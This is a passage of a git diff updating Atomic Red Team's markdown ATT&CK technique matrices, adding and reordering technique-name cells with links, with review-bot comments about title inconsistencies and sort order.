+| | | [Create Account: Cloud Account](../../T1136.003/T1136.003.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md) | | | | | | | |
+| | | [Account Manipulation](../../T1098/T1098.md) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
+| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Code Signing Policy Modification](../../T1553.006/T1553.006.md) | | | | | | | |
+| | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution](../../T1546/T1546.md) | [Deploy a container](../../T1610/T1610.md) | | | | | | | |
+| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
+| | | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
+| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | | | | | | |
+| | | Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | | | | | | |
+| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
+| | | [IIS Components](../../T1505.004/T1505.004.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) | | | | | | | |
+| | | [Event Triggered Execution](../../T1546/T1546.md) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification](../../T1222/T1222.md) | | | | | | | |
+| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | [Authentication Package](../../T1547.002/T1547.002.md) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | | | | | | | |
+| | | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
+| | | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
+| | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | [BITS Jobs](../../T1197/T1197.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
+| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
+| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
+| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
+| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
+| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: ListPlanting](../../T1055.015/T1055.015.md) | [Plist File Modification](../../T1647/T1647.md) | | | | | | | |
+| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
+| | | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Build Image on Host](../../T1612/T1612.md) | | | | | | | |
+| | | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | | | | | | | |
+| | | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md) | | | | | | | |
+| | | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
+| | | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | | | | | | | |
+| | | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
+| | | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
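Review bot: the Defense Evasion cell `[Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md)` in this hunk pairs an Email Collection title with a T1070.008 path, while every other T1070.x entry in the same hunk is titled "Indicator Removal on Host: ..." (Clear FreeBSD, Linux or Mac System Logs, Clear Command History, Timestomp, Clear Windows Event Logs); check the display name in the T1070.008 atomic so the generated title matches its parent technique and the column it sits in. In the same region, `[Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md)` carries a trailing period inside the link text that no other title has. Also note that the visible part of this hunk is almost entirely `+` rows with only the last three rows as unchanged context, so the table cannot be reviewed cell by cell; please confirm the file was regenerated by the index generator rather than edited by hand.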
@@ -134,6 +136,7 @@
| | | | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Run Virtual Instance](../../T1564.006/T1564.006.md) | | | | | | | |
+| | | | | Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | | | | | | | |
| | | | | Network Boundary Bridging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
@@ -155,11 +158,14 @@
| | | | | Modify Cloud Compute Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
+| | | | | ClickOnce [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | | | Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | | | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
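Review bot: the three added rows ("ClickOnce", "Relocate Malware", "Masquerade Account Name") are bare sub-technique names with no parent technique and no ID, so a contributor scanning the CONTRIBUTE A TEST cells cannot tell what "ClickOnce" or "Relocate Malware" is a sub-technique of, or which Txxxx.yyy directory a new test should go in; the linked rows beside them mostly use the qualified form ("Impair Defenses: Disable Cloud Logs", "Hide Artifacts: Hidden Window"), though "[HTML Smuggling](../../T1027.006/T1027.006.md)" shows the generator is already inconsistent about this. Suggest making the generator emit "Parent: Sub" (plus the ID) for every cell, linked or not. As in the previous hunk, the insertion points ("ClickOnce"/"Relocate Malware" between "Hidden Window" and "Conditional Access Policies", "Masquerade Account Name" between "Clear Persistence" and "Domain Controller Authentication") follow no evident sort order, which is worth fixing for diff stability.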
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index 66673d798d..6ab595b62d 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -5,54 +5,55 @@
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Link](../../T1566.002/T1566.002.md) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [OS Credential Dumping](../../T1003/T1003.md) | [Group Policy Discovery](../../T1615/T1615.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Device Driver Discovery](../../T1652/T1652.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Replication Through Removable Media](../../T1091/T1091.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | [Automated Exfiltration](../../T1020/T1020.md) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | [Service Stop](../../T1489/T1489.md) |
-| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
